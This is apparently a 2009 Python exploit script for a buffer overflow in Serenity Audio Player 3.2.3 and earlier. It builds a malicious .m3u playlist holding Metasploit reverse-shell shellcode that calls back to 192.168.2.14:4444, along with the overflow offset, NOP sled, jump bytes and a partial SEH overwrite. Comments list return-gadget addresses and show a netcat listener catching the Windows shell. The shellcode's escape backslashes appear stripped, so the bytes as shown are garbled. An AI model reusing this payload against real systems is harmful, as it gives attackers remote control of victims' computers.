#!/usr/bin/python
#
# ######################################################################
#
# Exploit Title     : Serenity Audio Player Playlist (.m3u) BOF
# Discovered by	    : Rick from Corelan Team (ricks2600[at]gmail[dot]com)
# Author            : mr_me
# Author contact    : seeleymagic[at]hotmail[dot]com
# Date              : nov 24th, 2009
# Type              : local and remote code execution
# OS                : Windows XP sp3
# Product           : Serenity Audio Player
# Version           : <= 3.2.3
# Download          : http://malsmith.kyabram.biz/serenity/
# Greetz	    : rick,edi,dellnull,marko T,phifli,corelanc0d3r
# Visit		    : corelanc0d3r's blog http://www.corelan.be:8800/
#
# ######################################################################
#
# Description:
#
# Serenity is a playlist based audio player for Windows. It features a clean and simple
# interface with minimal overhead. Formats supported are limited only by CODECs and
# drivers installed on the machine.
#
# See the kind of p/p/r I have to deal with ? :P
#
# 0x004040e7 pop esi; pop ebp; retn 0x0010
# 0x00404482 pop esi; pop ebp; retn 0x0010
# 0x00404c95 pop ebx; pop ebp; retn 0x0010
# 0x00404dd3 pop edi; pop esi; retn 0x0004
# 0x004054cb pop esi; pop ebx; retn 0x0004
# 0x00405543 pop edi; pop esi; retn 0x0004
# 0x0040558b pop esi; pop ebx; retn 0x0008
# 0x00405641 pop esi; pop ebp; retn 0x0008
# 0x004057af pop ebp; pop ebx; retn 0x0008
# 0x00405855 pop ebx; pop ebp; retn 0x0014
# 0x00405bee pop esi; pop ebx; retn 0x0004
#
# Visit corelanc0d3r's blog: http://www.corelan.be:8800/
#
# mrme@home:~/serenity$ nc -lvp 4444
# listening on [any] 4444 ...
# 192.168.2.13: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.14] from (UNKNOWN) [192.168.2.13] 3761
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Program FilesSerenity>

# windows/shell_reverse_tcp - 287 bytes
# http://www.metasploit.com
# LHOST=192.168.2.14, EXITFUNC=seh, LPORT=4444

sc =(
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24" +
"x8bx45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5f" +
"x20x01xebx49x8bx34x8bx01xeex31xc0x99xacx84" +
"xc0x74x07xc1xcax0dx01xc2xebxf4x3bx54x24x28" +
"x75xe5x8bx5fx24x01xebx66x8bx0cx4bx8bx5fx1c" +
"x01xebx03x2cx8bx89x6cx24x1cx61xc3x31xdbx64" +
"x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40x08x5e" +
"x68x8ex4ex0execx50xffxd6x66x53x66x68x33x32" +
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50" +
"xffxd6x5fx89xe5x66x81xedx08x02x55x6ax02xff" +
"xd0x68xd9x09xf5xadx57xffxd6x53x53x53x53x43" +
"x53x43x53xffxd0x68xc0xa8x02x0ex66x68x11x5c" +
"x66x53x89xe1x95x68xecxf9xaax60x57xffxd6x6a" +
"x10x51x55xffxd0x66x6ax64x66x68x63x6dx6ax50" +
"x59x29xccx89xe7x6ax44x89xe2x31xc0xf3xaax95" +
"x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab" +
"x68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51" +
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05" +
"xcex53xffxd6x6axffxffx37xffxd0x68xe7x79xc6" +
"x79xffx75x04xffxd6xffx77xfcxffxd0x68xf0x8a" +
"x04x5fx53xffxd6xffxd0");

boom = ("http://");
boom += ("x41" * (992 -len(sc)-10));   # offset
boom += ("x90" * 10)                   # some nops just incase
boom += (sc)                            # shellcode
boom +=("xe9xd4xfexffxff")         # we're flying baby
boom += ("xebxf9x90x90")            # short jump back
boom += ("xe8x47x40");               # partial overwrite.. sneaky

file=open('mr_me_owns_serenity.m3u','w')
file.write(boom)
file.close()
print "[+] mr_me_owns_serenity.m3u file created successfully"